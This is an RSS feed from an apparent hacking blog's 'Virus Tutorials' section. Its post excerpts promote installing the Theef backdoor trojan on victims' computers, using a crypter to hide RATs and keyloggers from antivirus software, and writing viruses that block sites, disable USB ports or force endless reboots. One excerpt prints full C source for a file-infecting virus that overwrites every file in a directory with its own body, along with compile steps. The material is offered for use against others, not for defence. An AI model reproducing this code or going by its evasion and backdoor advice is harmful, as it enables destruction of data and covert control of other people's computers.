<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>DJROHAN The Indian Hacker [Indian Boforce] &#187; Virus Tutorials</title>
	<atom:link href="http://www.djrohan.com/blog/category/virus-tutorials/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.djrohan.com/blog</link>
	<description>DJROHAN The Indian Hacker</description>
	<lastBuildDate>Wed, 04 Jan 2012 10:56:55 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Theef: BackDoor Trojan</title>
		<link>http://www.djrohan.com/blog/2009/11/theef-backdoor-trojan/</link>
		<comments>http://www.djrohan.com/blog/2009/11/theef-backdoor-trojan/#comments</comments>
		<pubDate>Sat, 28 Nov 2009 13:24:52 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Internet Hacking]]></category>
		<category><![CDATA[Virus Tutorials]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[theef]]></category>
		<category><![CDATA[trojan]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=660</guid>
		<description><![CDATA[Theef is definitely among the best hacking tools I have ever used.  It is easy to use and intuitive, but best of all it gives you a great deal of options.  This is why you will be learning to use it today.
Theef is a Windows based application for both the client and server end.  The Theef server is a virus that you install on your victims computer, and the Theef client in what you then use to control the virus.  The biggest problem with using Theef is that most Anti-Virus ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/07/how-to-prevent-files-and-folder-from-being-copied/' rel='bookmark' title='Permanent Link: How To Prevent Files And Folder From Being Copied'>How To Prevent Files And Folder From Being Copied</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/re-enable-run-task-manager-regedit-cmd-folder-options-and-system-restore/' rel='bookmark' title='Permanent Link: Re-Enable Run, Task Manager, Regedit, CMD, Folder Options and System Restore'>Re-Enable Run, Task Manager, Regedit, CMD, Folder Options and System Restore</a></li>
<li><a href='http://www.djrohan.com/blog/2009/11/fast-and-easy-method-to-get-kaspersky-antivirus-2010-license-activation-code-for-6-months/' rel='bookmark' title='Permanent Link: Fast And Easy Method To Get Kaspersky Antivirus 2010 License Activation Code For 6 Months'>Fast And Easy Method To Get Kaspersky Antivirus 2010 License Activation Code For 6 Months</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/11/theef-backdoor-trojan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Virus Program To Block Websites</title>
		<link>http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/</link>
		<comments>http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 15:52:33 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=473</guid>
		<description><![CDATA[Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/' rel='bookmark' title='Permanent Link: A Virus Program To Restart The Computer At Every Startup'>A Virus Program To Restart The Computer At Every Startup</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/' rel='bookmark' title='Permanent Link: How To Create A Easy Computer Virus?'>How To Create A Easy Computer Virus?</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/' rel='bookmark' title='Permanent Link: Create Make Virus Program To Disable USB Ports'>Create Make Virus Program To Disable USB Ports</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Create A Easy Computer Virus?</title>
		<link>http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/</link>
		<comments>http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 15:36:43 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=470</guid>
		<description><![CDATA[This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.
#include&#60;stdio.h&#62;
#include&#60;io.h&#62;
#include&#60;dos.h&#62;
#include&#60;dir.h&#62;
#include&#60;conio.h&#62;
#include&#60;time.h&#62;
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&#38;ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x&#62;2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&#38;ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:

BORLAND TC++ 3.0 (16-BIT):

1. Load the program in ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/' rel='bookmark' title='Permanent Link: A Virus Program To Restart The Computer At Every Startup'>A Virus Program To Restart The Computer At Every Startup</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/' rel='bookmark' title='Permanent Link: Create Make Virus Program To Disable USB Ports'>Create Make Virus Program To Disable USB Ports</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/' rel='bookmark' title='Permanent Link: A Virus Program To Block Websites'>A Virus Program To Block Websites</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Create Make Virus Program To Disable USB Ports</title>
		<link>http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/</link>
		<comments>http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 14:40:56 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Virus Tutorials]]></category>
		<category><![CDATA[Create Virus]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=441</guid>
		<description><![CDATA[In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/' rel='bookmark' title='Permanent Link: How To Create A Easy Computer Virus?'>How To Create A Easy Computer Virus?</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/' rel='bookmark' title='Permanent Link: A Virus Program To Restart The Computer At Every Startup'>A Virus Program To Restart The Computer At Every Startup</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/' rel='bookmark' title='Permanent Link: A Virus Program To Block Websites'>A Virus Program To Block Websites</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Virus Program To Restart The Computer At Every Startup</title>
		<link>http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/</link>
		<comments>http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 15:14:21 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=454</guid>
		<description><![CDATA[Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-block-websites/' rel='bookmark' title='Permanent Link: A Virus Program To Block Websites'>A Virus Program To Block Websites</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/' rel='bookmark' title='Permanent Link: How To Create A Easy Computer Virus?'>How To Create A Easy Computer Virus?</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/' rel='bookmark' title='Permanent Link: Create Make Virus Program To Disable USB Ports'>Create Make Virus Program To Disable USB Ports</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/09/a-virus-program-to-restart-the-computer-at-every-startup/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FUD Crypter : Bypass Antivirus Detection For RATs &amp; Viruses</title>
		<link>http://www.djrohan.com/blog/2009/08/fud-crypter-bypass-antivirus-detection-for-rats-viruses/</link>
		<comments>http://www.djrohan.com/blog/2009/08/fud-crypter-bypass-antivirus-detection-for-rats-viruses/#comments</comments>
		<pubDate>Tue, 25 Aug 2009 16:54:05 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Decryption]]></category>
		<category><![CDATA[Software Programming]]></category>
		<category><![CDATA[Spyware]]></category>
		<category><![CDATA[Trojan Horse]]></category>
		<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=353</guid>
		<description><![CDATA[I have mentioned about antiviruses detecting RATs as hacking software (viruses) and hence, hacker has to use Crypters to avoid antivirus detection for RATs. So, read on to know more on Crypters &#8211; hacking software for bypassing antivirus detections. I have provided link for software download.

What is Crypter???
As said above, Crypter is hacking program or application used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/08/how-to-use-binder-to-disable-antivirus-detection/' rel='bookmark' title='Permanent Link: How To Use Binder To Disable Antivirus Detection'>How To Use Binder To Disable Antivirus Detection</a></li>
<li><a href='http://www.djrohan.com/blog/2009/11/remove-fake-antivirus-and-fake-antispyware-automatically/' rel='bookmark' title='Permanent Link: Remove Fake Antivirus and Fake Antispyware Automatically'>Remove Fake Antivirus and Fake Antispyware Automatically</a></li>
<li><a href='http://www.djrohan.com/blog/2009/11/fast-and-easy-method-to-get-kaspersky-antivirus-2010-license-activation-code-for-6-months/' rel='bookmark' title='Permanent Link: Fast And Easy Method To Get Kaspersky Antivirus 2010 License Activation Code For 6 Months'>Fast And Easy Method To Get Kaspersky Antivirus 2010 License Activation Code For 6 Months</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2009/08/fud-crypter-bypass-antivirus-detection-for-rats-viruses/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How To Compile C Programs</title>
		<link>http://www.djrohan.com/blog/2007/09/how-to-compile-c-programs/</link>
		<comments>http://www.djrohan.com/blog/2007/09/how-to-compile-c-programs/#comments</comments>
		<pubDate>Sun, 09 Sep 2007 14:14:45 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Software Programming]]></category>
		<category><![CDATA[Virus Tutorials]]></category>
		<category><![CDATA[C++ Comple]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=436</guid>
		<description><![CDATA[In many of my  posts especially in the Virus Tutorials section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
How to install Borland C++ compiler
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
How to configure Borland C++ compiler
1. After you install Borland C++ compier, ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/' rel='bookmark' title='Permanent Link: How To Create A Easy Computer Virus?'>How To Create A Easy Computer Virus?</a></li>
<li><a href='http://www.djrohan.com/blog/2007/01/a-self-destructing-program-in-c-c/' rel='bookmark' title='Permanent Link: A Self Destructing Program in C / C++'>A Self Destructing Program in C / C++</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/' rel='bookmark' title='Permanent Link: Create Make Virus Program To Disable USB Ports'>Create Make Virus Program To Disable USB Ports</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2007/09/how-to-compile-c-programs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Change The ICON Of An EXE File</title>
		<link>http://www.djrohan.com/blog/2007/05/how-to-change-the-icon-of-an-exe-file/</link>
		<comments>http://www.djrohan.com/blog/2007/05/how-to-change-the-icon-of-an-exe-file/#comments</comments>
		<pubDate>Wed, 09 May 2007 14:21:55 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Software Programming]]></category>
		<category><![CDATA[Trojan Horse]]></category>
		<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=438</guid>
		<description><![CDATA[Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2011/01/lock-your-computer-with-shortcut/' rel='bookmark' title='Permanent Link: Lock Your Computer With Shortcut'>Lock Your Computer With Shortcut</a></li>
<li><a href='http://www.djrohan.com/blog/2009/08/change-the-text-of-start-button-xp/' rel='bookmark' title='Permanent Link: Change The Text Of Start Button XP'>Change The Text Of Start Button XP</a></li>
<li><a href='http://www.djrohan.com/blog/2009/10/associate-any-file-with-notepad/' rel='bookmark' title='Permanent Link: Associate Any File with Notepad'>Associate Any File with Notepad</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2007/05/how-to-change-the-icon-of-an-exe-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Self Destructing Program in C / C++</title>
		<link>http://www.djrohan.com/blog/2007/01/a-self-destructing-program-in-c-c/</link>
		<comments>http://www.djrohan.com/blog/2007/01/a-self-destructing-program-in-c-c/#comments</comments>
		<pubDate>Tue, 09 Jan 2007 15:29:10 +0000</pubDate>
		<dc:creator>Rohan</dc:creator>
				<category><![CDATA[Virus Tutorials]]></category>

		<guid isPermaLink="false">http://www.djrohan.com/blog/?p=465</guid>
		<description><![CDATA[This program will destroy itself upon execution.The program will cause the .exe file to be deleted upon execution.That is this program is capable of destroying itself upon execution.Heres the code
#include&#60;stdio.h&#62;
#include&#60;conio.h&#62;
#include&#60;dos.h&#62;
void main()
{
printf(”This program will destroy itself if u press any key!!!\n”);
getch();
remove(_argv[0]);/*array of pointers to command line arguments*/
}
HOW TO COMPILE ?
Load the source code to the compiler and compile(press Alt-F9) and then press F9.This will generate the .exe file in the current directory(Bin directory).Execute this .exe file it will destroy itself upon execution.
Random PostsFind If Your Nokia Cell Phone Is OriginalHow To ...


Related posts:<ol><li><a href='http://www.djrohan.com/blog/2009/09/a-virus-program-to-disable-usb-ports/' rel='bookmark' title='Permanent Link: Create Make Virus Program To Disable USB Ports'>Create Make Virus Program To Disable USB Ports</a></li>
<li><a href='http://www.djrohan.com/blog/2009/09/how-to-create-a-easy-computer-virus/' rel='bookmark' title='Permanent Link: How To Create A Easy Computer Virus?'>How To Create A Easy Computer Virus?</a></li>
<li><a href='http://www.djrohan.com/blog/2009/07/how-to-prevent-files-and-folder-from-being-copied/' rel='bookmark' title='Permanent Link: How To Prevent Files And Folder From Being Copied'>How To Prevent Files And Folder From Being Copied</a></li>
</ol>]]></description>
		<wfw:commentRss>http://www.djrohan.com/blog/2007/01/a-self-destructing-program-in-c-c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

